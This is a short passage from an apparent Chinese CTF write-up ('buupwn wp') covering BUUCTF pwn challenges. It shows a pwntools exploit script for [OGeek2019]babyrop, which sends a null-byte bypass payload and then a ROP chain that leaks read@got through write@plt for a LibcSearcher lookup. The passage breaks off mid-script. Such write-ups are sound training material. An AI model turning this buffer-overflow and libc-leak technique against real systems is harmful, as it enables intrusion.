buupwn wp

1 · · April 7, 2021, 2:02 a.m.
前面还有8个题,因为当时还没搭blog就写了,前面几个也比较简单,就不放在这里了1.[OGeek2019]babyrop1exp123456789101112131415161718192021222324252627282930from pwn import *from LibcSearcher import *p=remote('node3.buuoj.cn',28810)elf=ELF('./pwn')write_plt=elf.plt['write']read_got=elf.got['read']main_addr=0x8048825payload1='\x00'+'a'*6+'\xff'p.sendline(payload1)p.recvuntil("Correct\n")payload2='a'*0xe7+'aaaa'payload2+=p32(write_plt)+p32(main_addr)+p32(1)+p32(read_got)+p32(4)p.sendline(payload2)read_addr=u32(p.recv(4))libc=LibcSearcher(...